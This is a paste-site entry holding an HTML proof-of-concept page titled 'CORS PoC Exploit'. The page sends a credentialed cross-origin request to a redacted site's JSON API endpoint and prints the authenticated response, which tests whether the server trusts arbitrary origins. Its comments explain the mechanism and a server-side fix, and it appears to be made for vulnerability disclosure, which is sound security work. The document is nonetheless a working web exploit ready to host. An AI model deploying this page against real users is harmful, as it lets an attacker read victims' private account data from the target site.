colded

CORS Exploit

Dec 28th, 2020
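  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title>CORS PoC Exploit</title>
    <style>
      main { text-align: center; }
    </style>
    <script>
      /*
       * Proof of concept for a CORS policy check on a JSON endpoint.
       *
       * cors() sends a credentialed cross-origin GET. The browser only hands
       * the response body to this page when the server answers with an
       * Access-Control-Allow-Origin that names this page's origin (a wildcard
       * is not accepted for credentialed requests) together with
       * Access-Control-Allow-Credentials: true. A readable response therefore
       * means the endpoint trusts an origin it should not.
       *
       * Server-side fix: compare the Origin header against a fixed allowlist
       * instead of echoing it back, and send Access-Control-Allow-Credentials
       * only on endpoints that need authenticated cross-origin reads.
       * NOTE(review): whether session cookies are attached at all also
       * depends on their SameSite attribute; confirm against the target's
       * cookie settings.
       */
      function cors() {
        // The result container; its id must match the element in <body>.
        var out = document.getElementById("demo");
        var xhttp = new XMLHttpRequest();

        xhttp.onreadystatechange = function () {
          if (this.readyState === 4 && this.status === 200) {
            // textContent, not innerHTML: the body comes from another origin
            // and must be shown as text, never parsed as markup in this page.
            out.textContent = this.responseText;
          }
        };

        // A blocked cross-origin read surfaces as a network-level error,
        // which is the expected result against a correctly configured server.
        xhttp.onerror = function () {
          out.textContent = "Request failed or the response was not readable cross-origin.";
        };

        xhttp.open("GET", "https://www.███/api/jsonws/relo-service-plugin-portlet.content/get-content-by-slug/slug/page-ex-link", true);
        // Ask the browser to attach cookies / HTTP auth for the target origin.
        xhttp.withCredentials = true;
        xhttp.send();
      }

      // Bind the handler in script rather than with an inline onclick attribute.
      document.addEventListener("DOMContentLoaded", function () {
        document.getElementById("run").addEventListener("click", cors);
      });
    </script>
  </head>
  <body>
    <main>
      <h1>CORS PoC Exploit </h1>
      <p>created by <a href="https://twitter.com/Jarvis7717">@Jarvis</a></p>
      <p>Show full content of page</p>
      <div id="demo">
        <button type="button" id="run">Exploit</button>
      </div>
    </main>
  </body>
  </html>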